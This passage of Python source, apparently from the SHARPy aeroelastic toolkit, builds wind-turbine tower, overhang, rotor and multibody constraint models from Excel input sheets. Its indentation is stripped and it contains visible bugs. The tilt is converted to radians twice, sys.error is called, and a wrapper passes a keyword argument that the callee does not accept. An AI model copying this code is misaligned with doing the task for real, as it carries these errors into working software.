TowerHt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TowerHt')
Elevation = TowerHt*HtFract
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Stiffness: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'overhang')
# HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NacMass')
# NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assembly overhang with the tower
# numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
# cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
node_pos[:,0] += np.linspace(0.,overhang_len*np.sin(tilt*deg2rad), overhang.StructuralInformation.num_node)
node_pos[:,2] = np.linspace(0.,-overhang_len*np.cos(tilt*deg2rad), overhang.StructuralInformation.num_node)
# TODO: change the following by real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assembly the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
# Define the multibody infromation for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
######################################################################
# FROM excel type02
######################################################################
def rotor_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_excel_type02.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_discretization_blade = 'discretization_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_info = 'airfoil_info',
excel_sheet_airfoil_coord = 'airfoil_coord',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3,
user_defined_m_distribution_type = None,
camber_effect_on_twist = False,
wsp = 0.,
dt = 0.):
"""
generate_from_excel_type02_db
Function needed to generate a wind turbine from an excel database type02
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_discretization_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_info (str):
excel_sheet_airfoil_coord (str):
excel_sheet_parameters (str):
h5_cross_sec_prop (str): h5 containing mass and stiffness matrices along the blade.
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
rotor (sharpy.utils.generate_cases.AeroelasticInfromation): Aeroelastic information of the rotor
Note:
- h5_cross_sec_prop is a path to a h5 containing the following groups:
- str_prop: with:
- K: list of 6x6 stiffness matrices
- M: list of 6x6 mass matrices
- radius: radial location (including hub) of K and M matrices
- when h5_cross_sec_prop is not None, mass and stiffness properties are
interpolated at BlFract location specified in "excel_sheet_structural_blade"
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
rR_structural = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'rR')
OutPElAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'OutPElAxis')
InPElAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'InPElAxis')
ElAxisAftLEc = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'ElAxisAftLEc')
StrcTwst = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst')*deg2rad
BMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
FlapEdgeStiff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlapEdgeStiff')
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
FlpIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
FlapEdgeIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlapEdgeIner')
PrebendRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrebendRef')
PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
OutPcg = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'OutPcg')
InPcg = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'InPcg')
# Blade parameters
TipRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TipRad')
# HubRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'HubRad')
# Discretization points
rR = gc.read_column_sheet_type01(excel_file_name, excel_sheet_discretization_blade, 'rR')
# Interpolate excel variables into the correct locations
# Geometry
if rR[0] < rR_structural[0]:
rR_structural = np.concatenate((np.array([0.]), rR_structural),)
OutPElAxis = np.concatenate((np.array([OutPElAxis[0]]), OutPElAxis),)
InPElAxis = np.concatenate((np.array([InPElAxis[0]]), InPElAxis),)
ElAxisAftLEc = np.concatenate((np.array([ElAxisAftLEc[0]]), ElAxisAftLEc),)
StrcTwst = np.concatenate((np.array([StrcTwst[0]]), StrcTwst),)
BMassDen = np.concatenate((np.array([BMassDen[0]]), BMassDen),)
FlpStff = np.concatenate((np.array([FlpStff[0]]), FlpStff),)
EdgStff = np.concatenate((np.array([EdgStff[0]]), EdgStff),)
FlapEdgeStiff = np.concatenate((np.array([FlapEdgeStiff[0]]), FlapEdgeStiff),)
GJStff = np.concatenate((np.array([GJStff[0]]), GJStff),)
EAStff = np.concatenate((np.array([EAStff[0]]), EAStff),)
FlpIner = np.concatenate((np.array([FlpIner[0]]), FlpIner),)
EdgIner = np.concatenate((np.array([EdgIner[0]]), EdgIner),)
FlapEdgeIner = np.concatenate((np.array([FlapEdgeIner[0]]), FlapEdgeIner),)
PrebendRef = np.concatenate((np.array([PrebendRef[0]]), PrebendRef),)
PreswpRef = np.concatenate((np.array([PreswpRef[0]]), PreswpRef),)
OutPcg = np.concatenate((np.array([OutPcg[0]]), OutPcg),)
InPcg = np.concatenate((np.array([InPcg[0]]), InPcg),)
# Base parameters
use_excel_struct_as_elem = False
if use_excel_struct_as_elem:
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_elem = len(rR) - 2
blade.StructuralInformation.compute_basic_num_node()
node_r, elem_r = create_node_radial_pos_from_elem_centres(rR*TipRad,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
else:
# Use excel struct as nodes
# Check the number of nodes
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_node = len(rR)
if ((len(rR) - 1) % (blade.StructuralInformation.num_node_elem - 1)) == 0:
blade.StructuralInformation.num_elem = int((len(rR) - 1)/(blade.StructuralInformation.num_node_elem - 1))
node_r = rR*TipRad
elem_rR = rR[1::2] + 0.
elem_r = rR[1::2]*TipRad + 0.
else:
print("ERROR: Cannot build ", blade.StructuralInformation.num_node_elem, "-noded elements from ", blade.StructuralInformation.num_node, "nodes")
node_y = np.interp(rR,rR_structural,InPElAxis) + np.interp(rR,rR_structural,PreswpRef)
node_z = -np.interp(rR,rR_structural,OutPElAxis) - np.interp(rR,rR_structural,PrebendRef)
node_twist = -1.0*np.interp(rR,rR_structural,StrcTwst)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_y, node_z)
if h5_cross_sec_prop is None:
# Stiffness
elem_EA = np.interp(elem_rR,rR_structural,EAStff)
elem_EIy = np.interp(elem_rR,rR_structural,FlpStff)
elem_EIz = np.interp(elem_rR,rR_structural,EdgStff)
elem_EIyz = np.interp(elem_rR,rR_structural,FlapEdgeStiff)
elem_GJ = np.interp(elem_rR,rR_structural,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1] = np.interp(elem_rR,rR_structural,InPcg)
elem_pos_cg_B[:,2] = -np.interp(elem_rR,rR_structural,OutPcg)
elem_mass_per_unit_length = np.interp(elem_rR,rR_structural,BMassDen)
elem_mass_iner_y = np.interp(elem_rR,rR_structural,FlpIner)
elem_mass_iner_z = np.interp(elem_rR,rR_structural,EdgIner)
elem_mass_iner_yz = np.interp(elem_rR,rR_structural,FlapEdgeIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B, elem_mass_iner_yz)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz, elem_EIyz)
else: # read Mass/Stiffness from database
cross_prop=h5.readh5(h5_cross_sec_prop).str_prop
# create mass_db/stiffness_db (interpolate at mid-node of each element)
blade.StructuralInformation.mass_db = scint.interp1d(
cross_prop.radius, cross_prop.M, kind='cubic', copy=False, assume_sorted=True, axis=0,
bounds_error = False, fill_value='extrapolate')(node_r[1::2])
blade.StructuralInformation.stiffness_db = scint.interp1d(
cross_prop.radius, cross_prop.K, kind='cubic', copy=False, assume_sorted=True, axis=0,
bounds_error = False, fill_value='extrapolate')(node_r[1::2])
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
rR_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'rR')
chord_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlChord')
thickness_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlThickness')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_airfoil_info, 'Name')
pure_airfoils_thickness = gc.read_column_sheet_type01(excel_file_name, excel_sheet_airfoil_info, 'Thickness')
node_ElAxisAftLEc = np.interp(node_r,rR_structural*TipRad,ElAxisAftLEc)
# Read coordinates of the pure airfoils
n_pure_airfoils = len(pure_airfoils_names)
pure_airfoils_camber=np.zeros((n_pure_airfoils,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(n_pure_airfoils):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoils at the defined chord points
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(rR_aero)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord = np.interp(node_r, rR_aero*TipRad, chord_aero)
# Define the nodes with aerodynamic properties
# Look for the first element that is goint to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=rR_aero[0]*TipRad):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
# Define the airfoil at each stage
# airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
node_thickness = np.interp(node_r, rR_aero*TipRad, thickness_aero)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber_thickness(pure_airfoils_camber, pure_airfoils_thickness, node_thickness, n_points_camber)
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
# User defined m distribution
if (m_distribution == 'user_defined') and (user_defined_m_distribution_type == 'last_geometric'):
# WSP =10.5
# dt = 0.01846909261369661/2
blade_nodes = blade.StructuralInformation.num_node
udmd_by_nodes = np.zeros((blade_nodes, chord_panels[0] + 1))
for inode in range(blade_nodes):
r = np.linalg.norm(blade.StructuralInformation.coordinates[inode, :])
vrel = np.sqrt(rotation_velocity**2*r**2 + wsp**2)
# ielem, inode_in_elem = gc.get_ielem_inode(blade.StructuralInformation.connectivities, inode)
last_length = vrel*dt/node_chord[inode]
last_length = np.minimum(last_length, 0.5)
if last_length <= 0.5:
ratio = gc.get_factor_geometric_progression(last_length, 1., chord_panels)
udmd_by_nodes[inode, -1] = 1.
udmd_by_nodes[inode, 0] = 0.
for im in range(chord_panels[0] -1, 0, -1):
udmd_by_nodes[inode, im] = udmd_by_nodes[inode, im + 1] - last_length
last_length *= ratio
# Check
if (np.diff(udmd_by_nodes[inode, :]) < 0.).any():
sys.error("ERROR in the panel discretization of the blade in node %d" % (inode))
else:
print("ERROR: cannot match the last panel size for node:", inode)
udmd_by_nodes[inode,:] = np.linspace(0, 1, chord_panels + 1)
else:
udmd_by_nodes = None
# udmd_by_elements = gc.from_node_array_to_elem_matrix(udmd_by_nodes, rotor.StructuralInformation.connectivities[0:int((blade_nodes-1)/2), :])
# rotor.user_defined_m_distribution = (udmd_by_elements, udmd_by_elements, udmd_by_elements)
node_twist = np.zeros_like(node_chord)
if camber_effect_on_twist:
print("WARNING: The steady applied Mx should be manually multiplied by the density")
for inode in range(blade.StructuralInformation.num_node):
node_twist[inode] = gc.get_aoacl0_from_camber(airfoils[inode, :, 0], airfoils[inode, :, 1])
mu0 = gc.get_mu0_from_camber(airfoils[inode, :, 0], airfoils[inode, :, 1])
r = np.linalg.norm(blade.StructuralInformation.coordinates[inode, :])
vrel = np.sqrt(rotation_velocity**2*r**2 + wsp**2)
if inode == 0:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[1,:] - blade.StructuralInformation.coordinates[0,:])
elif inode == len(blade.StructuralInformation.coordinates[:,0]) - 1:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[-1,:] - blade.StructuralInformation.coordinates[-2,:])
else:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[inode + 1,:] - blade.StructuralInformation.coordinates[inode - 1,:])
moment_factor = 0.5*vrel**2*node_chord[inode]**2*dr
# print("node", inode, "mu0", mu0, "CMc/4", 2.*mu0 + np.pi/2*node_twist[inode])
blade.StructuralInformation.app_forces[inode, 3] = (2.*mu0 + np.pi/2*node_twist[inode])*moment_factor
airfoils[inode, :, 1] *= 0.
# Write SHARPy format
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
node_twist,
np.pi*np.ones_like(node_chord),
chord_panels,
surface_distribution,
m_distribution,
node_ElAxisAftLEc,
airfoil_distribution,
airfoils,
udmd_by_nodes)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply pitch
blade.StructuralInformation.rotate_around_origin(np.array([1.,0.,0.]), -pitch_deg*deg2rad)
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -cone)
# Build the whole rotor
rotor = blade.copy()
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), tilt)
return rotor
def generate_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_excel_type02.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_discretization_blade = 'discretization_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_info = 'airfoil_info',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_structural_tower = 'structural_tower',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3,
user_defined_m_distribution_type = None,
wsp = 0.,
dt = 0.):
"""
generate_from_excel_type02
Function needed to generate a wind turbine from an excel database according to OpenFAST inputs
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_coord (str):
excel_sheet_parameters (str):
excel_sheet_structural_tower (str):
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInfromation): Aeroelastic infrmation of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInfrmation)
"""
rotor = rotor_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= excel_file_name,
excel_sheet_parameters = excel_sheet_parameters,
excel_sheet_structural_blade = excel_sheet_structural_blade,
excel_sheet_discretization_blade = excel_sheet_discretization_blade,
excel_sheet_aero_blade = excel_sheet_aero_blade,
excel_sheet_airfoil_info = excel_sheet_airfoil_info,
excel_sheet_airfoil_coord = excel_sheet_airfoil_coord,
m_distribution = m_distribution,
h5_cross_sec_prop = h5_cross_sec_prop,
n_points_camber = n_points_camber,
tol_remove_points = tol_remove_points,
user_defined_m_distribution = user_defined_m_distribution,
wsp = 0.,
dt = 0.)
######################################################################
## TOWER
######################################################################
# Read from excel file
HtFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'HtFract')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
# TODO> variables to be defined
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
TowerHt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TowerHt')
Elevation = TowerHt*HtFract
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Stiffness: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'overhang')
# HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NacMass')
# NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assembly overhang with the tower
